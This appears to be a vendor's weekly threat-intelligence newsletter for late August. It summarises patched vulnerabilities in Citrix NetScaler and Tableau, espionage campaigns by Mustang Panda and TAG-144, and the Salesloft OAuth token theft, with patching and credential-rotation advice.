Hybrid Cloud
Cyber Security & NaaS
AI & Data
IoT & Connectivity
Business Applications
Intelligent Workplace
Consulting & Professional Services
Small Medium Enterprise
Health and Social Care
Industry
Retail
Tourism and Leisure
Transport & Logistics
Energy & Utilities
Cyber Security Weekly Briefing, 23-29 August
Citrix fixes critical NetScaler RCE flaw exploited in zero-day attacks
Citrix has fixed three vulnerabilities in NetScaler ADC and NetScaler Gateway, highlighting the critical CVE-2025-7775 (CVSSv4 of 9.2 according to the manufacturer), a memory overflow flaw that allows remote code execution without authentication and was actively exploited as a zero-day.
The other two flaws correspond to CVE-2025-7776 (CVSSv4 of 8.8 according to Citrix), a memory overflow that generates a DoS condition, and CVE-2025-8424 (CVSSv4 of 8.7 according to Citrix), caused by improper access control in the management interface.
The flaws affect versions prior to 14.1-47.48, 13.1-59.22, 13.1-37.241-FIPS/NDcPP, and 12.1-55.330-FIPS/NDcPP, so Citrix recommends updating the firmware as soon as possible. Although the CVE-2025-7775 flaw has been observed in real attacks, no public exploits have been detected.
Mustang Panda: sophisticated cyber espionage tactics in 2025
Picus Security has exposed the tactics, techniques, and procedures of the Mustang Panda APT group, active since 2014 and linked to Chinese state cyber espionage. The group attacks government entities, NGOs, and religious organizations in the US, Europe, and Asia through spear-phishing campaigns with geopolitical lures and modular malware such as PlugX, Poison Ivy, and new families such as FDMTP.
In 2025, authorities dismantled more than 4,200 PlugX infections distributed via USB, demonstrating the actor's persistence. Mustang Panda employs tactics such as spear-phishing with LNK files, abuse of “msiexec.exe” for fileless execution, and DLL side-loading. For persistence, it uses registry keys, scheduled tasks, and malicious services.
Notable evasion techniques include process injections, credential theft with LSASS dumping, and discovery techniques with WMI and system commands. Collection includes screenshots, keylogging, and compression with WinRAR.
TAG-144 intensifies attacks against government entities in South America
TAG-144, also known as Blind Eagle or APT-C-36, has carried out five campaigns between May 2024 and July 2025, targeting government entities in Colombia and, to a lesser extent, Ecuador, Chile, and Panama. Active since 2018, it combines cyber espionage and financial fraud using remote access Trojans such as AsyncRAT, REMCOS RAT, DcRAT, LimeRAT, and XWorm.
According to Recorded Future, the campaigns use multi-stage infection chains and abuse legitimate services such as Discord, GitHub, and Archive.org, as well as steganography techniques. The infrastructure includes VPS, IPs from Colombian ISPs, dynamic domains on duckdns.org and noip.com, and VPNs to hide operations.
Some campaigns take advantage of free hosting, Telegram, and phishing pages that impersonate banks such as Bancolombia. Links to Red Akodon were also detected through shared repositories and compromised accounts.
New bugs patched in Tableau Server and Desktop
Salesforce has fixed several critical vulnerabilities in Tableau Server and Desktop. The most serious is CVE-2025-26496 (CVSSv3 of 9.6 according to CISA), a type confusion flaw that allows local code inclusion and arbitrary execution in file upload modules.
Other flaws include CVE-2025-26497 and CVE-2025-26498 (CVSSv3 of 7.7 according to the manufacturer), which allow the upload of malicious files in the Flow Editor and establish-connection-no-undo modules, as well as CVE-2025-52450 and CVE-2025-52451 (CVSSv3 of 8.5 according to the manufacturer), which affect the tabdoc API through validation and path traversal flaws. They affect Tableau Server versions prior to 2025.1.4, 2024.2.13, and 2023.3.20, and the corresponding versions of Tableau Desktop on Windows and Linux.
Attackers compromise Salesloft to steal OAuth tokens and access Salesforce
Salesloft confirmed a breach in its SalesDrift integration with Salesforce, where attackers stole OAuth and refresh tokens between August 8 and 18, 2025. With these credentials, the actors accessed Salesforce instances and ran SOQL queries to extract sensitive data, including AWS keys, passwords, and tokens related to Snowflake.
According to Google Threat Intelligence, the UNC6395 group is behind the campaign, employing hidden infrastructure on Tor, AWS, and DigitalOcean, and custom tools such as Salesforce-Multi-Org-Fetcher. Although ShinyHunters initially claimed responsibility for the attack, there is no evidence linking it to them. Salesloft and Salesforce revoked all active tokens, requesting customers to reconnect the integration.
It is recommended to rotate credentials, review logs, and search for possible exposed secrets, such as AKIA keys, Snowflake credentials, and VPN or SSO access URLs.
◾ This newsletter is one of the deliverables of our Operational and Strategic Intelligence service. If you are interested in knowing the rest of the Operational and Strategic Intelligence contents included in the service, please contact us →
